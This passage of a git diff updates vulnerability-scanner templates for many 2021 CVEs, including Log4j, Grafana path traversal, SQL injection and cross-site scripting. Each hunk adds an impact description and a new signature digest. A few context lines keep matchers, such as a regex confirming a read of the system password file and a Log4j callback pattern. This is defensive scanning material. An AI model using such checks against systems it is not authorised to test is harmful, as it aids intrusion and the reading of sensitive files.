   remediation: |
     To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
   reference:
@@ -58,4 +60,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100b830bbb8413581c15746ab095d877abbdc93486b5d49cdb845e6487f066e5a4102210080c08f12a3e42ac2e521c0ea42aa17ff7fd1a3be664748a718a2ae13a4934338:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220191d48a13f90521a950a50eed82b3b0817d4ecf0c695ef49270fbf5723dabcba022008e69f1b1a5cd8ab82c612d6063b8737722960a6a045bb5de70b634679c76372:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-42667.yaml b/http/cves/2021/CVE-2021-42667.yaml
index a4f0f86e1a..cff9254374 100644
--- a/http/cves/2021/CVE-2021-42667.yaml
+++ b/http/cves/2021/CVE-2021-42667.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Online Event Booking and Reservation System 2.3.0 contains a SQL injection vulnerability in event-management/views. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Apply the latest patch or update to a non-vulnerable version of the Online Event Booking and Reservation System.
   reference:
@@ -55,4 +57,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450220644ac2b58d5eafabe2bb34fe9673f44c50377c44272e52ab9883a37754d7253a022100d327595d12b43cd8f7d621e148f4c65a2236fc45691e3559e1ed832e3966ae42:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100a5025c7a382267e2f274b81ccf3a91f0591d2ea63c3351e232521df8acc9fe3102202ae09009b9b35f18bc2fa95e9865aaa0915c976c15d03f7550a0f367dee33509:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-42887.yaml b/http/cves/2021/CVE-2021-42887.yaml
index 302a5d1646..c12bc5a9a6 100644
--- a/http/cves/2021/CVE-2021-42887.yaml
+++ b/http/cves/2021/CVE-2021-42887.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     TOTOLINK EX1200T 4.1.2cu.5215 is susceptible to authentication bypass. An attacker can bypass login by sending a specific request through formLoginAuth.htm, thus potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to gain unauthorized access to the device, potentially leading to further compromise of the network.
   remediation: |
     Apply the latest firmware update provided by TOTOLINK to fix the authentication bypass vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 302
-# digest: 4a0a00473045022000afa92e90b5e4220bd055424ca1b338928c7e1b453cea7a022a5e95a56ee5df0221009c11922816fabb65c7f42e568cd6dcfeeab47d88f438f6bd900239865e2fd533:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022016fc867733fff31af8802cee706c130f41b01d150bb29cf2d80e30a95a18714c0220133447e1bbb41b2e91264c191bf1034be157b9bc180dd42efb4b53234434edcb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-43062.yaml b/http/cves/2021/CVE-2021-43062.yaml
index 9117a8ba99..71f3cebd66 100644
--- a/http/cves/2021/CVE-2021-43062.yaml
+++ b/http/cves/2021/CVE-2021-43062.yaml
@@ -5,6 +5,8 @@ info:
   author: ajaysenr
   severity: medium
   description: A cross-site scripting vulnerability in FortiMail may allow an unauthenticated attacker to perform an attack via specially crafted HTTP GET requests to the FortiGuard URI protection service.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patch or upgrade to a non-vulnerable version of Fortinet FortiMail.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100ec9cac8ca1d8077ebbfed685287405fc3d69cf180a6585762ae13baccdb95fda022068c0f99cb2ee83f86398e5a72396d65230839748e31f53285387474ef106f6f1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e7d356e39b0589f256e751eeb7a7dce0c302cff6938447bd74e8dd5a242e77f50221008abedcdc0b4558316601f39b80ec45013304cc0379e3e86b2b2302a091e00e6e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-43287.yaml b/http/cves/2021/CVE-2021-43287.yaml
index af1d1cde8b..bc6d844390 100644
--- a/http/cves/2021/CVE-2021-43287.yaml
+++ b/http/cves/2021/CVE-2021-43287.yaml
@@ -5,6 +5,8 @@ info:
   author: dhiyaneshDk
   severity: high
   description: GoCD contains a critical information disclosure vulnerability whose exploitation allows unauthenticated attackers to leak configuration information including build secrets and encryption keys.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access and control over the build pipelines, potentially resulting in the execution of arbitrary code or unauthorized modifications.
   remediation: Upgrade to version v21.3.0. or later.
   reference:
     - https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402203c61a78ee5e5ef5b0996269749c8b898ba600ec063cce0e9e37420dbc8427a0702202a7e900130fb018a4a9ed80202b8f8fd63efde533c3c5a30bd764e2b5198afb1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502203a7d497315afaaf21924ba6d4e08ef3c64c5711c6b663f22ca8f9744a803f2f6022100fded7ec236a4e28ef2d41e2f2d4f06f7794418c710b5b8adbdeb16d11a1752e6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-43421.yaml b/http/cves/2021/CVE-2021-43421.yaml
index 73625ef7b1..896cc67ee6 100644
--- a/http/cves/2021/CVE-2021-43421.yaml
+++ b/http/cves/2021/CVE-2021-43421.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Studio-42 elFinder 2.0.4 to 2.1.59 is vulnerable to unauthenticated file upload via connector.minimal.php which could allow a remote user to upload arbitrary files and execute PHP code.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to upload malicious files to the server and execute arbitrary code.
   remediation: |
     Upgrade to the latest version of Studio-42 elFinder plugin (2.1.60 or higher) to mitigate this vulnerability.
   reference:
@@ -55,4 +57,4 @@ http:
         regex:
           - '"hash"\:"(.*?)"\,'
         internal: true
-# digest: 4a0a0047304502206c10aabbe007362f4e82a766561ba6964815f651c7109095ddefbb551987e454022100e57a3a432fcf73ba5b75fec55353f4a5c384d601286d6191bc2c1467b880de7e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100e898d798ae9c14f326b19b05fc86aad840dcfcbb72c02d7bd75b60517a3a1b8c022017fc4a29e7f62d02e011c291b3c64a5e5d6efda9b2ba75b6cb54f54c9b26bf72:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-43495.yaml b/http/cves/2021/CVE-2021-43495.yaml
index bb8b1a2d7c..86fd801224 100644
--- a/http/cves/2021/CVE-2021-43495.yaml
+++ b/http/cves/2021/CVE-2021-43495.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: high
   description: AlquistManager branch as of commit 280d99f43b11378212652e75f6f3159cde9c1d36 is affected by a directory traversal vulnerability in alquist/IO/input.py. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or remote code execution.
   remediation: |
     Ensure that user-supplied input is properly validated and sanitized before being used in file inclusion functions.
   reference:
@@ -34,4 +36,4 @@ http:
         part: body
         regex:
           - "root:.*:0:0:"
-# digest: 4a0a00473045022100a3ca10deb5a08ce4247671c0acfeaa8d38d901ea1225696ff51b7e08857aadc102206cb278c94b45a22537dc88eab408a0faf0d8abccc149fbdf9d1e66bcd1064a84:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f4f6dd1f046bc77bec8649e0e307c8c87734ecdbb3d86515695f9b08e7a66c6002201d2d1ecd18971bfad04e7522baf4ef410b31da379f3c573140d0a91e2673a11e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-43496.yaml b/http/cves/2021/CVE-2021-43496.yaml
index 2937866d15..30766fe199 100644
--- a/http/cves/2021/CVE-2021-43496.yaml
+++ b/http/cves/2021/CVE-2021-43496.yaml
@@ -5,6 +5,8 @@ info:
   author: Evan Rubinstein
   severity: high
   description: Clustering master branch as of commit 53e663e259bcfc8cdecb56c0bb255bd70bfcaa70 is affected by a directory traversal vulnerability. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access.
+  impact: |
+    This vulnerability can result in unauthorized access to sensitive files and directories, as well as the execution of arbitrary code on the affected system.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -34,4 +36,4 @@ http:
         part: body
         regex:
           - "root:.*:0:0:"
-# digest: 4b0a00483046022100db8599b9db616472af47f708caf44ba9ce4f0a226865fc2c835b5fb99aaf4853022100c231c85c79588023acae8548c9b14c1f32dc4681276794155c280cab9592dfc2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022049f80cfd268663b7471a5c6e539da6ec11ec7f746ef5ea26254319c5cdacfce102203dab23697f3efd5e2fed8b211c8ef994574a07ba722e99e5a15ce84f5c206716:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-43510.yaml b/http/cves/2021/CVE-2021-43510.yaml
index bb7bd39bfe..cc05909a0a 100644
--- a/http/cves/2021/CVE-2021-43510.yaml
+++ b/http/cves/2021/CVE-2021-43510.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Sourcecodester Simple Client Management System 1.0 contains a SQL injection vulnerability via the username field in login.php. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Sourcecodester Simple Client Management System 1.0.
   reference:
@@ -48,4 +50,4 @@ http:
           - 'contains(body_1, "{\"status\":\"success\"}")'
           - 'contains(body_2, "Welcome to Simple Client")'
         condition: and
-# digest: 490a0046304402201cd0988df73bc4e3469d454b68c8c46a5fa8f767d4577aeaad52bc9dbf3d9430022013938782db84a01567d185ff8ec663f3bcbbe35a941afdd23447b5e94c0696c8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402203a0ab8e7dad641a0ac24f7b2412149af3dfc3aafb857dc09dad47d472e6835a5022044f288c927a9dc2eba9544a293f833520be950e3bdc4b67e0ae295853d4cafc1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-43574.yaml b/http/cves/2021/CVE-2021-43574.yaml
index 1e59c63469..7e698a9305 100644
--- a/http/cves/2021/CVE-2021-43574.yaml
+++ b/http/cves/2021/CVE-2021-43574.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Atmail 6.5.0 contains a cross-site scripting vulnerability in WebAdmin Control Pane via the format parameter to the default URI, which allows remote attackers to inject arbitrary web script or HTML via the “format” parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patches or updates provided by Atmail to fix the XSS vulnerability.
   reference:
@@ -55,4 +57,4 @@ http:
           - 500
           - 403
         condition: or
-# digest: 4a0a0047304502203685cb8f3d7f3bd5d9105f3c6454016a4c12dc5c8928144dd8543d5b8eeaf94c022100fb4859d6acf63672535e991fff20cf53db60a13a5655096227f310c7c70dd3a8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ef7d4e14a4fcebb0c5b33bfd62e566b302bf628137befadff4b67e08dc6423e902202d9783f0480ce8d8616b14f1aade23111f15492d05d878d0626e3b050c1cff29:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-43725.yaml b/http/cves/2021/CVE-2021-43725.yaml
index 28162dd644..f793f12162 100644
--- a/http/cves/2021/CVE-2021-43725.yaml
+++ b/http/cves/2021/CVE-2021-43725.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     There is a Cross Site Scripting (XSS) vulnerability in SpotPage_login.php of Spotweb 1.5.1 and below, which allows remote attackers to inject arbitrary web script or HTML via the data[performredirect] parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, potentially leading to session hijacking, data theft, or other attacks.
   remediation: Fixed in version 1.5.2
   reference:
     - https://github.com/spotweb/spotweb/
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502205b9252e8060b0820f2ac90f7fe9348c199f26bd84166aee37d9baaf4cd4c89c8022100f0b6b99825169f938ff218fba2bedac1cdcc5eb42b28c69b2f8f2183889556cf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201fa369ca6cdf106df05279772b3b0e35dc5303fa523bb7ebb2d82ca2060bb883022100d7bd178f112e615b75e2c25135868b283f27e27bbb1e5c521503b4154708088e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-43734.yaml b/http/cves/2021/CVE-2021-43734.yaml
index 6fa5fb6f59..fed685d6c4 100644
--- a/http/cves/2021/CVE-2021-43734.yaml
+++ b/http/cves/2021/CVE-2021-43734.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     kkFileview v4.0.0 is vulnerable to local file inclusion which may lead to a sensitive file leak on a related host.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.
   remediation: |
     Upgrade to a patched version of kkFileview v4.0.1 or later, or apply the necessary security patches provided by the vendor.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100a620419262164d1308566b24020b2aa2c1c9b324cd6bf67b9dc7828599b05363022100d9553d332bfe8d7631acf501363ae09f15c3e54fef6f656c6c8e8a4ee0c9bd6a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220253bf8f631e13d4653e032e9fa40f026d6a84a8a62847467b59ee09f8f192b3e02200dc58153db1387208119e12c263d6dfba3593b87a17716a05da48495ae8be5df:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-43778.yaml b/http/cves/2021/CVE-2021-43778.yaml
index b047df1fc9..65af477984 100644
--- a/http/cves/2021/CVE-2021-43778.yaml
+++ b/http/cves/2021/CVE-2021-43778.yaml
@@ -5,6 +5,8 @@ info:
   author: cckuailong
   severity: high
   description: Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability.
+  impact: |
+    An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or sensitive information disclosure.
   remediation: Upgrade to version 2.6.1 or later. Or, as a workaround, delete the `front/send.php` file.
   reference:
     - https://github.com/AK-blank/CVE-2021-43778
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402202f9eabb70cac808c96647ab779cc533c9b4ade8d55fbc201e4869372da3f4e86022037a52b8abbac6b58b01c6ab926c4251f45c8e85191c69a0771eae9bb9e6f82e5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220164ed608e19c403747f19df8fab9a07c803874131dee49def46f1f2d6ec7c369022100c58ca4902949fe5c7ad553d2c98e6664ccb5e868dadfe837d6f59e9c8927456f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-43798.yaml b/http/cves/2021/CVE-2021-43798.yaml
index d8aae8adca..720152f189 100644
--- a/http/cves/2021/CVE-2021-43798.yaml
+++ b/http/cves/2021/CVE-2021-43798.yaml
@@ -5,6 +5,8 @@ info:
   author: z0ne,dhiyaneshDk,j4vaovo
   severity: high
   description: Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is `<grafana_host_url>/public/plugins/NAME/`, where NAME is the plugin ID for any installed plugin.
+  impact: |
+    An attacker can read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation.
   remediation: Upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1.
   reference:
     - https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
@@ -54,4 +56,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100bc0aabea7bd67419781557c0ed43b567d8381dee98e70bf972afeb60a31edac5022100d27fc2893ad548c038e255a53fbaa2a07f212306463647abc182092286fea169:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220579451c40fa4698d028c26e6b678bf84f3eadd0c02c592718de4663e3a7d030202206e342c98d21bdd4aab2b5175332437055ba4a949316233ce4aa39b5f833020b9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-43810.yaml b/http/cves/2021/CVE-2021-43810.yaml
index 978dc43bb0..f0bb254ed9 100644
--- a/http/cves/2021/CVE-2021-43810.yaml
+++ b/http/cves/2021/CVE-2021-43810.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: medium
   description: A cross-site scripting vulnerability is present in Admidio prior to version 4.0.12. The reflected cross-site scripting vulnerability occurs because redirect.php does not properly validate the value of the url parameter. Through this vulnerability, an attacker is capable to execute malicious scripts.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: Upgrade to version 4.0.12 or later.
   reference:
     - https://github.com/Admidio/admidio/security/advisories/GHSA-3qgf-qgc3-42hh
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100aa97fad8cc94c671751b3ccc4d4b6ffece5b34d70ed77388ddc1a1e83b61c750022100a35808180a00b41613ed2f0c315aab8024ff645ef546fd8a505ff0a28a7289d6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022061ff444611fb0353ad3e8e07dc8a9a77cd6a2f901e911260cfb909bf2e79b298022100928e5d1f717402b2a816f2a8d0805227130695fc6c4301d59d666e3f296403b4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-44077.yaml b/http/cves/2021/CVE-2021-44077.yaml
index d5a0b91599..d91af0d730 100644
--- a/http/cves/2021/CVE-2021-44077.yaml
+++ b/http/cves/2021/CVE-2021-44077.yaml
@@ -5,6 +5,8 @@ info:
   author: Adam Crosser,gy741
   severity: critical
   description: Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014 are vulnerable to unauthenticated remote code execution.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the latest security patch or upgrade to a patched version of Zoho ManageEngine ServiceDesk Plus.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220484a57bd75bc242afccfa29004ebfb6775473294b044b64a87ae154af5e2a23f0220487637b7a44a2683cdb18e1fe0b0d19089642fdcf41adcdd4405d298b5c1ba22:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e09a39da9f257d0235a6e4d63ce07841f480c6394847aa443c1ec2af53737df2022100f8416abd5b11affdf41770e76634d24e54e5c9dc6b1463b05e9c56e6f37c5bbb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-44138.yaml b/http/cves/2021/CVE-2021-44138.yaml
index 6de11ca415..bc5e751b3e 100644
--- a/http/cves/2021/CVE-2021-44138.yaml
+++ b/http/cves/2021/CVE-2021-44138.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     There is a Directory traversal vulnerability in Caucho Resin, as distributed in Resin 4.0.52 - 4.0.56, which allows remote attackers to read files in arbitrary directories via a ; in a pathname within an HTTP request.
+  impact: |
+    An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or sensitive data exposure.
   remediation: |
     Upgrade Caucho Resin to a version higher than 4.0.56 to mitigate the vulnerability.
   reference:
@@ -54,4 +56,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502204923a787c1fa7a344a8480a07acf29b5949642604306db73eb30fea3bcbf08dc022100f26b664a8ee8a833c81d37a00116150862381763f08f7d0ba25a9607fe811722:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100fd352b9187db265f500ec76d944f3e3b960b1f93ce4567bb38a095240165863d02201d4ff0ac9dbb1ade29152da046a6c5cc1b73ace3fede7b1444c9050019533a48:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-44139.yaml b/http/cves/2021/CVE-2021-44139.yaml
index ecc55dfbf5..3bdbb94200 100644
--- a/http/cves/2021/CVE-2021-44139.yaml
+++ b/http/cves/2021/CVE-2021-44139.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     There is a Pre-Auth SSRF vulnerability in Alibaba Sentinel version 1.8.2, which allows remote unauthenticated attackers to perform SSRF attacks via the /registry/machine endpoint through the ip parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to send crafted requests from the server, potentially leading to unauthorized access to internal resources or network scanning.
   remediation: |
     Apply the latest security patches or updates provided by Alibaba Sentinel to fix the SSRF vulnerability (CVE-2021-44139).
   reference:
@@ -48,4 +50,4 @@ http:
           - '"success":true'
           - '"msg":"success"'
         condition: and
-# digest: 4b0a00483046022100abf8d865f5d417f5a29959b00fd221c90c1860b194181c8215451e3c545373be022100dc65e4ee4267bf08ab0f4009bcd661ca87b28e14b537fcd754881cd7da5d141b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022062e88b5a0cf737df0d2a69b11956afb9a40244ed037881abeae58f7609d937c3022100b484a5faabd1beab1bdc133f8691e481276082c2abac7fc5bb17d3fb8e0df82d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-44152.yaml b/http/cves/2021/CVE-2021-44152.yaml
index e4367d87e0..62b0b76d2f 100644
--- a/http/cves/2021/CVE-2021-44152.yaml
+++ b/http/cves/2021/CVE-2021-44152.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Reprise License Manager (RLM) 14.2 does not verify authentication or authorization and allows unauthenticated users to change the password of any existing user.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the Reprise License Manager.
   remediation: |
     Apply the latest security patch or upgrade to a patched version of Reprise License Manager to mitigate this vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502210085f44a157110988947a7042158d2bb6a8fe7150655151def8abcb9316056413f022033a9a53f020fe687641512b95805167d84f19993ed4adf5c93c74ac1228cd420:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220391510d1158793348becdb16ff6648ee8af338964a2ff6d6b06184748a0883890220786343192ee51077ed43ee96c457e205e12a35c6ba603a5309651d89fb693c48:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-44228.yaml b/http/cves/2021/CVE-2021-44228.yaml
index c95e0072cf..75fa544168 100644
--- a/http/cves/2021/CVE-2021-44228.yaml
+++ b/http/cves/2021/CVE-2021-44228.yaml
@@ -5,6 +5,8 @@ info:
   severity: critical
   description: |
     Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
+  impact: |
+    Successful exploitation of this vulnerability can lead to remote code execution, potentially compromising the affected system.
   remediation: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later).
   reference:
     - https://logging.apache.org/log4j/2.x/security.html
@@ -79,4 +81,4 @@ http:
           - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
         part: interactsh_request
         # digest: 4a0a0047304502202884fb76d02d44ae24b3e9bc5914a20e89726f929f3a1472cb9ce81e16f6c7320221009fb4e79fd5e58f4a49ccbeff467c990c3be6e32a7e03a2af8db207849e937d5f:922c64590222798bb761d5b6d8e72950
-# digest: 4a0a0047304502200103df60bec2b312cf1195386baa90d4af4903524eceb84092ef047eff3b4dda022100d66b16d1416f453cecdfda15e8239abffb34bd8c881f9ef7c4a986ebeb58e3a6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e5593d5c03ec20c23ba91518a1fd0252d55346685cab6bc43e5194abf8005142022100fe5d02457fe1176310270df7d2462cfa4671077a1dbae333eb611968a278d812:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-44427.yaml b/http/cves/2021/CVE-2021-44427.yaml
index b8f26605f1..322dd39d68 100644
--- a/http/cves/2021/CVE-2021-44427.yaml
+++ b/http/cves/2021/CVE-2021-44427.yaml
@@ -5,6 +5,8 @@ info:
   author: furkansayim,xShuden
   severity: critical
   description: An unauthenticated SQL injection vulnerability in Rosario Student Information System (aka rosariosis) 8.1 and below allow remote attackers to execute PostgreSQL statements (e.g., SELECT, INSERT, UPDATE, and DELETE) through /Side.php via the syear parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database, modify data, or execute arbitrary SQL commands.
   remediation: Upgrade to version 8.1.1 or higher.
   reference:
     - https://gitlab.com/francoisjacquet/rosariosis/-/issues/328
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100bb4b0365818834441eb03b48d6fbd6f8b738fdcc7d2671dc81fa44ca658e0c6202206e461730be04203504216c7c6e1ba5d846d62eeca134ed0fd401e96641065ae5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100faf111945db1472de62f86c1e0e2337866da0bbf7ace4b5611ba93e19424f71502204ec97cd54e16ce2bb427bc2a96e722a8652b2893e3bdce5b52591fa485e025fb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-44451.yaml b/http/cves/2021/CVE-2021-44451.yaml
index 580be54604..a34a540292 100644
--- a/http/cves/2021/CVE-2021-44451.yaml
+++ b/http/cves/2021/CVE-2021-44451.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Apache Superset through 1.3.2 contains a default login vulnerability via registered database connections for authenticated users. An attacker can obtain access to user accounts and thereby obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can gain unauthorized access to the Apache Superset application.
   remediation: Upgrade to Apache Superset 1.4.0 or higher.
   reference:
     - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json
@@ -69,4 +71,4 @@ http:
           - 'name="csrf_token" type="hidden" value="(.*)"'
         internal: true
         part: body
-# digest: 4a0a00473045022100b9db056656d9ae2ced4308d47b41e2525cd2cd2e5da129e9bdb51883a7038d1302207d2a951e45e1ca5f3a3b07750a0ee374dc9f2083c38b7214efe4f0f466023c0f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c76cf6a2556118027421b6128e0a3ffafb0659bea0cad1e729437f34aa97fed90220659ac8b35a83f796c1d0da095d37078789259a0d00bf589c6f96f06dd6c75670:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-44515.yaml b/http/cves/2021/CVE-2021-44515.yaml
index 7252b36e89..e45d67afda 100644
--- a/http/cves/2021/CVE-2021-44515.yaml
+++ b/http/cves/2021/CVE-2021-44515.yaml
@@ -5,6 +5,8 @@ info:
   author: Adam Crosser
   severity: critical
   description: Zoho ManageEngine Desktop Central contains an authentication bypass vulnerability that could allow an attacker to execute arbitrary code in the Desktop Central MSP server.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.
   reference:
     - https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-13-known-exploited-vulnerabilities-catalog
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
